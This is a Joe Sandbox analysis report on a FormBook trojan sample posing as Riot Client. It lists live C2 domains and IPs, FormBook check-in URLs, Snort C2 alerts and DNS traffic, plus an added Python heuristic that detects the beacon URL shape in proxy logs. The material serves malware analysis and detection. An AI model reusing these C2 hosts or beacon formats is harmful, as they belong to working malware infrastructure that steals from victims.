                                                        http://fontfabrik.com(NQBNpLezqZKv1P4.exe, 00000000.00000003.639552016.000000000555D000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        low
                                                        http://www.sandoll.co.kr8lNQBNpLezqZKv1P4.exe, 00000000.00000003.640398175.0000000005525000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown

                                                        Contacted IPs


                                                        Public

IP | Domain | Country | ASN | ASN Name | Malicious
156.241.53.248 | www.sh-zzjy.com | Seychelles | 136800 | XIAOZHIYUN1-AS-APICIDCNETWORK (US) | true
46.137.146.55 | round-peacock-r52qmr18tj1ljgerw1dev1ae.herokudns.com | Ireland | 16509 | AMAZON-02 (US) | true
104.143.9.211 | www.nirvananaturalcbd.net | United States | 64200 | VIVIDHOSTING (US) | true
184.168.131.241 | iafzal.com | United States | 26496 | AS-26496-GO-DADDY-COM-LLC (US) | true
156.241.53.21 | www.boicity.com | Seychelles | 136800 | XIAOZHIYUN1-AS-APICIDCNETWORK (US) | true
199.34.228.66 | www.zrcezzfdfkyjlir.com | United States | 27647 | WEEBLY (US) | true

                                                        General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 452473
Start date: 22.07.2021
Start time: 13:13:10
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 10s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: NQBNpLezqZKv1P4.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/1@7/6
EGA Information: Failed
HDC Information:
• Successful, ratio: 24.1% (good quality ratio 21%)
• Quality average: 71.5%
• Quality standard deviation: 33.4%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Excluded processes from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 52.147.198.201, 13.64.90.137, 168.61.161.212, 20.50.102.62, 205.185.216.42, 205.185.216.10, 20.54.110.249, 40.112.88.60, 80.67.82.235, 80.67.82.211, 20.82.209.183
• Excluded domains from analysis (whitelisted): skypedataprdcolwus17.cloudapp.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information.
• Report size getting too big; too many NtAllocateVirtualMemory calls found.

                                                        Simulations

                                                        Behavior and APIs

Time | Type | Description
13:14:20 | API Interceptor | 1x Sleep call for process: NQBNpLezqZKv1P4.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

Match | Associated Sample Name / URL | Detection | Context
104.143.9.211 | Y-20211907-00927735_pdf.exe | malicious | www.daniellageorges.com/uisg/?tF=ML04lb7xhZYx&5j3p=hhyAeZMb3zFiy4MOM2D3s3kjgT3RuE2EuTgtPMYOyuC8t4VCBdMXjazi2AHJSH/wEcpc
184.168.131.241 | G1638.exe | malicious | www.thedogmodel.com/hc3i/?JL0HnD=AEOrJsL6rGbsWfDwAgFkWYaihDHts4wGc065KMTZKhXMq5F1yQ8yw1LMQOwMcJswMbru&6l=y6ApP06pAPPL0p7
184.168.131.241 | Statement.xlsx | malicious | www.abbiescottdesigns.com/bsk9/?8paTU=pzuDZXAXFv2D4hw0&6l=MopRYPOW7JCjWP/1sAzbtOEx8U1HhEs2pWXoV4jagQPZKmP7AX4vdyuGLvxuJwa4zZDBpg==
184.168.131.241 | Payment Instruction.xlsx | malicious | www.cannibus-rx.com/gno4/?8p0p4zn=iEPMrV7ILrMnOAVARXhTlFvTv9GbImgTdlMtasoPFVRj/42YGlg1E2zruwKsUVio7YNnfQ==&CxlPa=y2JdyRFP5Fh8i
184.168.131.241 | F63V4i8eZU.exe | malicious | www.mikecdmusic.com/nff/?D48p=A3r1GoCxq8luIa6nCE3Ske6N+BTFMgq1N1qJ/FMsH45BCQO39yS3uoKBERul6QoZrrZt&-ZgX=tR-DSFa8o
184.168.131.241 | BANGKOK REG. SHIPMENT SUPPLY CIF BANGKOK 19-21 FULL DETAILS.exe | malicious | www.matkomiljevic.com/b6a4/?Qtx=qCsvzbIaH/CGU0c4Z7vgoGZzfGvizrvtlcJvThT2ItnQlVQYApGwkKJ+zmDyJqz7K2FB&p0GxMv=5jlLiBdP
184.168.131.241 | order no. YOIMM20190832 pdf.exe | malicious | www.strongerpayment.com/h388/?v81=pAstdHxZGWGfHmw1JPDLR+rRdT5Wd2dd0JVjSbi5Tem+ckTFR6mVjiPsXOruuAOIXiwt&s0Ghw=0vlTNP3x_f
184.168.131.241 | PROFORMA_INVOICE.xlsx | malicious | www.satyamsofficial.com/u6bi/?-Z60D0=4hO8rhRxxF4p2bmp&mrW4nr=6/DqqmU67My+o9WIEnQfg15rK68cX3oaURqPZnVLBGXmjCQ8oq4NJd8cVZ2k3j3bm4OM+Q==
184.168.131.241 | order PI specification N0-00128835%%.exe | malicious | www.ghouliani.com/h388/?x48D=bTq2osQPDvHdAPhVpCoSdi9rtLGs2KFahtYfViOOdi/nUy4auo+J+f3F4G5+lTaJ5vsR31D3UQ==&q8m0=MFQh2ZPPwjVHEde
184.168.131.241 | fb6YVPzIC1.exe | malicious | www.kat420nip.com/qmf6/?zd6tZ2=NbNxnFF0fFs88R&bFNp=Zv+eBnpAIFGmTI7p2xr5psf0Vi2YzEWTqeM4kLgFN5W9UQQQa9qsRCWDzA2mJxnFi8Tg
184.168.131.241 | 23BOqgo2Gn.exe | malicious | www.blackgirlvanlife.com/7bun/?z48HDp=PlKLWJz0Fllx3pm0&7nFtij=/gN6jVYNMVFDRayqbXkiyfbKJO5JP7TEqi3HPVa1wPvVanYFdjfGyUWlCJ9ff8Kj9D5R
184.168.131.241 | d6qU4nYIEp.exe | malicious | www.wthcoffee.com/dy8g/?Rlr=YtpudndwADuOlBifVFtGWXR4JyGy/IbN+CEsYhZgxxhckievLjWlo+wT/5l3C1gHGS7g&s2JL=Q4SxKzxPg
184.168.131.241 | PO_8356.pdf.exe | malicious | www.briankingfineart.com/ogpo/?7n0lq=dTcfCdwaIiENiusBFYeK5Px0FWRhWt92Mm3lebP8PLXeB8uAjBgQKXEu5MW9c1eHOvJwaxV/uw==&hnQLA0=d2MtV2hhcv98DBGP
184.168.131.241 | Tlz3P6ra10.exe | malicious | www.thriveglucose.com/p2io/?xXk8kx=Bxltd27xbtZdOP20&B6eTzpeH=bgEje2qoIMshrcRflwWQjpUULYzLZlDcA+elzyDX4pz+rZVwSlMQ2+HN9YiKWazZWK0rEbsmGg==
184.168.131.241 | 20hy7F77ShZV221.exe | malicious | www.empireofglam.com/cogt/?Z8qDI=rlXPMgteeH67sIOLSF2dCGYbsCcrTcMeWUUTRojqCE8KkK44PwA7ZHnM4ZUcfGmoJZOW&lR-Hn=6lxhenMPDFl4V
184.168.131.241 | vwffPcT2NE.exe | malicious | www.onetinyproject.com/7bun/?9riP=HJHSmVjVEQRXj5S0ipANZWzmM/Hlu23aV6iReq3JvMFZniLQ3bv2HSoq7OV+krl58FR8&kL3Xu=t484X2jh6NJxjj-P
184.168.131.241 | order spacification pdf.exe | malicious | www.strongerpayment.com/h388/?v468Mla=pAstdHxZGWGfHmw1JPDLR+rRdT5Wd2dd0JVjSbi5Tem+ckTFR6mVjiPsXOruuAOIXiwt&-Zr8=V44l1R
184.168.131.241 | 2GuNlCn0X6.exe | malicious | www.courtierkabyle.com/ushb/?PjND=Mlr4_4Sx&5j5=Mfaic7BYnuLfA3S1MkBhLcdZBOBWvpPcjePd2T0gGUCe/vHcO4ozxAM2oqSDUjuPRpVV
184.168.131.241 | 6660020210712_0-00010.XLS.exe | malicious | www.fostermarketing.energy/wz6a/?nluDS=LrYt&m6ApL=2XZNGGQYktPAsUu/ahuVsaXaEwpRRmnS5lzzQZsl9IG3KGSpvXx68Anyc9UBwoWT17Wg
184.168.131.241 | SecuriteInfo.com.Exploit.Rtf.Obfuscated.16.23572.rtf | malicious | www.listingallauto.com/slpb/?uP=aTQlizohqDVPsbOP&d6Dd=2ZqqrDcZ1B7k5sPUy5cxgCcAt+ptgw4L+UdrKgV+KOSxr7wkLzW4BhqhwhJOrLeK3SNRFg==
184.168.131.241 | C0TEsC936Q.exe | malicious | www.conectaragora.com/n84e/?rfgPc=p6i+kRTx6iVgorjxXMyecgcPSEfEpCNZNLMvo7qFW93Imy9WrDA1CQT3eoMLkfW3eO1IeBYl3w==&3f0x=IN981HP8SlixfBA
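The context URLs above, and the https://www.updates-app.com/4nn8/?Hdydvr=... URL found in NETSTAT.EXE memory in the URL table, share one shape: a single short alphanumeric path segment followed by a query of one or two short, random-looking parameter names, at least one of which carries a long base64-like token. The following Python is an added example written for this page (it is neither Joe Sandbox output nor FormBook's own code) that turns that shape into a hunting heuristic and runs it over a few constructed proxy-log lines. The path and parameter limits are assumptions drawn only from the URLs listed here, so matches are leads to verify against the contacted-IP list, not a blocking rule.

```python
import re
from urllib.parse import urlsplit

# Assumed shape of the check-in URLs listed on this page (heuristic, not a FormBook spec):
#   host / <3-4 lowercase alphanumerics> / ? <short name>=<long mixed-case token> [& <short name>=<short token>]
PATH_RE = re.compile(r"^/[a-z0-9]{3,4}/$")
NAME_RE = re.compile(r"^[A-Za-z0-9_-]{2,8}$")
TOKEN_RE = re.compile(r"^[A-Za-z0-9+/=_-]+$")


def _split_query(query):
    """Split the query without percent-decoding: '+' and '/' are part of the beacon token."""
    params = []
    for pair in query.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            params.append((name, value))
    return params


def _looks_like_token(value):
    """Long base64-like value mixing upper case, lower case and digits."""
    return (len(value) >= 16
            and TOKEN_RE.match(value) is not None
            and any(c.islower() for c in value)
            and any(c.isupper() for c in value)
            and any(c.isdigit() for c in value))


def _normalise(url):
    # The context URLs on the page carry no scheme; urlsplit needs one to find the host.
    return url if "://" in url else "http://" + url


def is_formbook_checkin(url):
    """True when the URL has the check-in shape described above."""
    parts = urlsplit(_normalise(url))
    if not PATH_RE.match(parts.path):
        return False
    params = _split_query(parts.query)
    if not 1 <= len(params) <= 2:
        return False
    if not all(NAME_RE.match(name) for name, _ in params):
        return False
    return any(_looks_like_token(value) for _, value in params)


def c2_key(url):
    """Host plus path segment, the part that stays stable across beacons (the query varies per victim)."""
    parts = urlsplit(_normalise(url))
    return parts.netloc.lower() + parts.path


# Constructed proxy-log sample (timestamp, client, method, URL); the URLs are taken from this report.
SAMPLE_PROXY_LOG = """\
2021-07-22T13:14:31Z 10.0.0.7 GET https://www.updates-app.com/4nn8/?Hdydvr=ihdw70LkX5hxMDN4QIP96
2021-07-22T13:14:32Z 10.0.0.7 GET http://www.fontbureau.com/designers/frere-user.html
2021-07-22T13:14:40Z 10.0.0.9 GET http://www.thedogmodel.com/hc3i/?JL0HnD=AEOrJsL6rGbsWfDwAgFkWYaihDHts4wGc065KMTZKhXMq5F1yQ8yw1LMQOwMcJswMbru&6l=y6ApP06pAPPL0p7
2021-07-22T13:14:41Z 10.0.0.9 GET https://www.example.com/abcd/?id=12345678901234567890
2021-07-22T13:14:42Z 10.0.0.9 GET http://050005.voodoo.com/js/partner.js
"""


def scan_proxy_log(text):
    """Return (timestamp, client, url) for every log line whose URL matches the check-in shape."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        ts, client, _method, url = fields[:4]
        if is_formbook_checkin(url):
            hits.append((ts, client, url))
    return hits


if __name__ == "__main__":
    for ts, client, url in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(f"{ts} {client} formbook-checkin-candidate {c2_key(url)}")
```

The digits-only query on www.example.com and the font-vendor and voodoo.com URLs fall through, while the updates-app.com and thedogmodel.com requests are flagged; grouping hits by c2_key() gives the host/path pairs to compare with the Contacted IPs table.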

                                                        Domains

                                                        No context

                                                        ASN

Match | Associated Sample Name / URL | Detection | Context
XIAOZHIYUN1-AS-APICIDCNETWORK (US) | Orden de compra cotizacion.exe | malicious | 23.226.51.219
XIAOZHIYUN1-AS-APICIDCNETWORK (US) | U1R7Ed7940 | malicious | 156.255.211.9
XIAOZHIYUN1-AS-APICIDCNETWORK (US) | leyw73RE9o | malicious | 23.235.167.110
XIAOZHIYUN1-AS-APICIDCNETWORK (US) | Tlz3P6ra10.exe | malicious | 156.255.140.216
XIAOZHIYUN1-AS-APICIDCNETWORK (US) | TdRlUtrbeS.exe | malicious | 154.207.35.108
XIAOZHIYUN1-AS-APICIDCNETWORK (US) | Petrogel SOA - Jul21.xlsx | malicious | 154.207.35.108
XIAOZHIYUN1-AS-APICIDCNETWORK (US) | 71q14am5gY.exe | malicious | 154.207.35.108
XIAOZHIYUN1-AS-APICIDCNETWORK (US) | PO#JFUB0002 FOR NEW ORDER.exe | malicious | 156.225.32.61
XIAOZHIYUN1-AS-APICIDCNETWORK (US) | factura y factura de la v#U00eda a#U00e9rea.exe | malicious | 156.241.53.145
XIAOZHIYUN1-AS-APICIDCNETWORK (US) | ZQGMiyaTir.exe | malicious | 156.241.53.161
XIAOZHIYUN1-AS-APICIDCNETWORK (US) | RFQ-BCM 03122020.exe | malicious | 156.241.53.127
XIAOZHIYUN1-AS-APICIDCNETWORK (US) | eHTLcWfhgv.exe | malicious | 156.241.53.161
XIAOZHIYUN1-AS-APICIDCNETWORK (US) | Nuvoco_RFQ_21-06-2021.exe | malicious | 156.234.184.179
XIAOZHIYUN1-AS-APICIDCNETWORK (US) | Gz98aWSGb5.exe | malicious | 156.241.53.223
XIAOZHIYUN1-AS-APICIDCNETWORK (US) | Swift_Report.exe | malicious | 156.241.53.223
XIAOZHIYUN1-AS-APICIDCNETWORK (US) | POWlzL.exe | malicious | 156.226.160.4
XIAOZHIYUN1-AS-APICIDCNETWORK (US) | Purchase_Order.exe | malicious | 156.241.53.127
XIAOZHIYUN1-AS-APICIDCNETWORK (US) | lTAPQJikGw.exe | malicious | 156.241.53.161
XIAOZHIYUN1-AS-APICIDCNETWORK (US) | Letter 09JUN 2021.xlsx | malicious | 156.241.53.161
XIAOZHIYUN1-AS-APICIDCNETWORK (US) | bank details.exe | malicious | 156.224.66.89
AMAZON-02 (US) | kkXJRT8vEl.exe | malicious | 52.217.42.228
AMAZON-02 (US) | kS2dqbsDwD.exe | malicious | 52.217.201.169
AMAZON-02 (US) | Nb2HQZZDIf.exe | malicious | 52.216.94.27
AMAZON-02 (US) | ovLjmo5UoE | malicious | 63.34.62.30
AMAZON-02 (US) | o3ZUDIEL1v | malicious | 18.151.13.78
AMAZON-02 (US) | D1dU3jQ1II | malicious | 34.208.242.240
AMAZON-02 (US) | mal.exe | malicious | 52.58.78.16
AMAZON-02 (US) | vjsBNwolo9.js | malicious | 76.223.26.96
AMAZON-02 (US) | r3xwkKS58W.exe | malicious | 52.217.135.113
AMAZON-02 (US) | A7X93JRxhp | malicious | 54.151.74.14
AMAZON-02 (US) | 1Ds9g7CEsp | malicious | 13.208.189.104
AMAZON-02 (US) | XuQRPW44hi | malicious | 54.228.23.118
AMAZON-02 (US) | Taf5zLti30 | malicious |
                                                        • 44.231.84.110
                                                        5qpsqg7U0GGet hashmaliciousBrowse
                                                        • 34.219.219.82
                                                        LyxN1ckWTWGet hashmaliciousBrowse
                                                        • 18.139.244.68
                                                        ZlvFNj.dllGet hashmaliciousBrowse
                                                        • 3.16.22.120
                                                        U4r9W64doyGet hashmaliciousBrowse
                                                        • 13.245.89.196
                                                        C4PozjQdGEGet hashmaliciousBrowse
                                                        • 18.135.214.121
                                                        kb5IbEJU8cGet hashmaliciousBrowse
                                                        • 18.227.43.189
                                                        MD5OxTSc6iGet hashmaliciousBrowse
                                                        • 18.149.163.217

                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NQBNpLezqZKv1P4.exe.log
                                                        Process:C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1314
                                                        Entropy (8bit):5.350128552078965
                                                        Encrypted:false
                                                        SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                        MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                        SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                        SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                        SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                        Malicious:true
                                                        Reputation:high, very likely benign file
                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Entropy (8bit):7.569459149457171
                                                        TrID:
                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                        • Windows Screen Saver (13104/52) 0.07%
                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                        File name:NQBNpLezqZKv1P4.exe
                                                        File size:714240
                                                        MD5:f03bf8d3ecc2ae4b40f836c59ac09bdf
                                                        SHA1:58f48a5a960eac4ee1f33ea16075cfd44f37b3a3
                                                        SHA256:2e4cf88a434d484057fcc090cb7de5deb6d30c8e00da339c886f2482f6a7ebe1
                                                        SHA512:9d174091b1bfb2e38da7cfb521bd5c6e471edb348e8e1c5cddd3b0784be6cd167617277c099d28927f97a24ee6a4e74d62e659dea23264d3c4ec738e6cee0255
                                                        SSDEEP:12288:4G0UB38XcvIFwXbrQtx0ChxIWzZc8o5UJAfEsyaUVKnp:4G0E8XcQWbVuSt5TfEzahp
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............P.............>.... ........@.. .......................@............@................................

                                                        File Icon

                                                        Icon Hash:00828e8e8686b000

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x4af93e
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                        Time Stamp:0x60F8BCE0 [Thu Jul 22 00:33:36 2021 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:v4.0.30319
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                        Entrypoint Preview

                                                        Instruction
                                                        jmp dword ptr [00402000h]
                                                        int3
                                                        jnc 00007F8DE88E1D8Dh
                                                        test al, EAh
                                                        pushfd
                                                        inc esi
                                                        add eax, 35C2CDF9h
                                                        adc ebp, dword ptr [edi+0Fh]
                                                        stc
                                                        int C2h
                                                        xor eax, 0F6F132Eh
                                                        add byte ptr [eax], al

                                                        Data Directories

                                                        Name | Virtual Address | Virtual Size | Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0xaf8ec | 0x4f | .text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb0000 | 0x618 | .rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb2000 | 0xc | .reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                        Sections

                                                        Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                        .text | 0x2000 | 0xad95c | 0xada00 | False | 0.776407262419 | data | 7.57888986763 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                        .rsrc | 0xb0000 | 0x618 | 0x800 | False | 0.3349609375 | data | 3.48372701638 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc | 0xb2000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        Name | RVA | Size | Type | Language | Country
                                                        RT_VERSION | 0xb0090 | 0x386 | data | |
                                                        RT_MANIFEST | 0xb0428 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                                                        Imports

                                                        DLL | Import
                                                        mscoree.dll | _CorExeMain

                                                        Version Infos

                                                        Description | Data
                                                        Translation | 0x0000 0x04b0
                                                        LegalCopyright | (c) 2019 Riot Games, Inc.
                                                        Assembly Version | 2.0.26.9
                                                        InternalName | FixedBufferAttribu.exe
                                                        FileVersion | 2.0.26.9
                                                        CompanyName | Riot Games, Inc.
                                                        LegalTrademarks |
                                                        Comments |
                                                        ProductName | Riot Client
                                                        ProductVersion | 2.0.26.9
                                                        FileDescription | Riot Client
                                                        OriginalFilename | FixedBufferAttribu.exe

                                                        Network Behavior

                                                        Snort IDS Alerts

                                                        Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                        07/22/21-13:15:39.181869 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49767 | 80 | 192.168.2.4 | 199.34.228.66
                                                        07/22/21-13:15:39.181869 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49767 | 80 | 192.168.2.4 | 199.34.228.66
                                                        07/22/21-13:15:39.181869 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49767 | 80 | 192.168.2.4 | 199.34.228.66
                                                        07/22/21-13:15:50.171392 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49769 | 80 | 192.168.2.4 | 104.143.9.211
                                                        07/22/21-13:15:50.171392 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49769 | 80 | 192.168.2.4 | 104.143.9.211
                                                        07/22/21-13:15:50.171392 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49769 | 80 | 192.168.2.4 | 104.143.9.211

                                                        Network Port Distribution

                                                        TCP Packets


                                                        UDP Packets


                                                        DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jul 22, 2021 13:15:27.176110983 CEST | 192.168.2.4 | 8.8.8.8 | 0x121f | Standard query (0) | www.boicity.com | A (IP address) | IN (0x0001)
Jul 22, 2021 13:15:33.012599945 CEST | 192.168.2.4 | 8.8.8.8 | 0x1ca7 | Standard query (0) | www.sh-zzjy.com | A (IP address) | IN (0x0001)
Jul 22, 2021 13:15:38.825973034 CEST | 192.168.2.4 | 8.8.8.8 | 0x73f | Standard query (0) | www.zrcezzfdfkyjlir.com | A (IP address) | IN (0x0001)
Jul 22, 2021 13:15:44.418431997 CEST | 192.168.2.4 | 8.8.8.8 | 0x641a | Standard query (0) | www.iafzal.com | A (IP address) | IN (0x0001)
Jul 22, 2021 13:15:49.904895067 CEST | 192.168.2.4 | 8.8.8.8 | 0x90fe | Standard query (0) | www.nirvananaturalcbd.net | A (IP address) | IN (0x0001)
Jul 22, 2021 13:15:55.338299036 CEST | 192.168.2.4 | 8.8.8.8 | 0x666d | Standard query (0) | www.updates-app.com | A (IP address) | IN (0x0001)
Jul 22, 2021 13:16:00.590152979 CEST | 192.168.2.4 | 8.8.8.8 | 0x299c | Standard query (0) | www.fbgroupsmadesimple.com | A (IP address) | IN (0x0001)

                                                        DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jul 22, 2021 13:15:27.237327099 CEST | 8.8.8.8 | 192.168.2.4 | 0x121f | No error (0) | www.boicity.com | | 156.241.53.21 | A (IP address) | IN (0x0001)
Jul 22, 2021 13:15:33.074120998 CEST | 8.8.8.8 | 192.168.2.4 | 0x1ca7 | No error (0) | www.sh-zzjy.com | | 156.241.53.248 | A (IP address) | IN (0x0001)
Jul 22, 2021 13:15:38.996172905 CEST | 8.8.8.8 | 192.168.2.4 | 0x73f | No error (0) | www.zrcezzfdfkyjlir.com | | 199.34.228.66 | A (IP address) | IN (0x0001)
Jul 22, 2021 13:15:44.483258009 CEST | 8.8.8.8 | 192.168.2.4 | 0x641a | No error (0) | www.iafzal.com | iafzal.com | | CNAME (Canonical name) | IN (0x0001)
Jul 22, 2021 13:15:44.483258009 CEST | 8.8.8.8 | 192.168.2.4 | 0x641a | No error (0) | iafzal.com | | 184.168.131.241 | A (IP address) | IN (0x0001)
Jul 22, 2021 13:15:50.046713114 CEST | 8.8.8.8 | 192.168.2.4 | 0x90fe | No error (0) | www.nirvananaturalcbd.net | | 104.143.9.211 | A (IP address) | IN (0x0001)
Jul 22, 2021 13:15:50.046713114 CEST | 8.8.8.8 | 192.168.2.4 | 0x90fe | No error (0) | www.nirvananaturalcbd.net | | 104.143.9.210 | A (IP address) | IN (0x0001)
Jul 22, 2021 13:15:55.428956985 CEST | 8.8.8.8 | 192.168.2.4 | 0x666d | No error (0) | www.updates-app.com | round-peacock-r52qmr18tj1ljgerw1dev1ae.herokudns.com | | CNAME (Canonical name) | IN (0x0001)
Jul 22, 2021 13:15:55.428956985 CEST | 8.8.8.8 | 192.168.2.4 | 0x666d | No error (0) | round-peacock-r52qmr18tj1ljgerw1dev1ae.herokudns.com | | 46.137.146.55 | A (IP address) | IN (0x0001)
Jul 22, 2021 13:15:55.428956985 CEST | 8.8.8.8 | 192.168.2.4 | 0x666d | No error (0) | round-peacock-r52qmr18tj1ljgerw1dev1ae.herokudns.com | | 18.203.219.9 | A (IP address) | IN (0x0001)
